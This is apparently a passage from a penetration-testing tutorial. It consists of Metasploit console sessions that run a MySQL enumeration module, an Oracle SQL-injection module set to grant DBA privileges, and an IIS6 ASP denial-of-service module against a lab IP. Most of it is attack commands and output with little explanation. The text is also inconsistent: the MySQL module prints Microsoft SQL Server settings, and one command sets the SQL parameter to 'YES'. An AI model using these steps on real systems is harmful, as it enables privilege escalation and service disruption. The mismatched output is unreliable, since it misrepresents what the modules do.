Working with administrative auxiliary modules

msf > use auxiliary/admin/mysql/mysql_enum

msf  auxiliary(mysql_enum) > show options

Module options (auxiliary/admin/mysql/mysql_enum):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the..
   RHOST                      yes       The target address
   RPORT     3306             yes       The target port
   USERNAME                   no        The username to..

msf  auxiliary(mysql_enum) > exploit

[*] Configuration Parameters:
[*]     C2 Audit Mode is Not Enabled
[*]     xp_cmdshell is Enabled
[*]     remote access is Enabled
[*]     allow updates is Not Enabled
[*]     Database Mail XPs is Not Enabled
[*]     Ole Automation Procedures are Not Enabled
[*] Databases on the server: 
[*]     Database name:master
===========================================================

SQL injection and DoS attack modules

msf  auxiliary(dbms_metadata_get_xml) > show options

Module options (auxiliary/sqli/oracle/dbms_metadata_get_xml):

   Name    Current Setting     Required  Description
   ----    ---------------     --------  -----------
   DBPASS  TIGER               yes       The password to..
   DBUSER  SCOTT               yes       The username to..
   RHOST                       yes       The Oracle host.
   RPORT   1521                yes       The TNS port.
   SID     ORCL                yes       The sid to authenticate.
   SQL     GRANT DBA to SCOTT  no        SQL to execute.

msf  auxiliary(dbms_metadata_get_xml) > set RHOST 192.168.56.1
msf  auxiliary(dbms_metadata_get_xml) > set SQL YES

msf  auxiliary(dbms_metadata_get_xml) > run


msf  auxiliary(ms10_065_ii6_asp_dos) > show options

Module options (auxiliary/dos/windows/http/ms10_065_ii6_asp_dos):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  80               yes       The target port
   URI    /page.asp        yes       URI to request
   VHOST                   no        The virtual host name to..

msf  auxiliary(ms10_065_ii6_asp_dos) > set RHOST 192.168.56.1
RHOST => 192.168.56.1
msf  auxiliary(ms10_065_ii6_asp_dos) > run

[*] Attacking http://192.168.56.1:80/page.asp


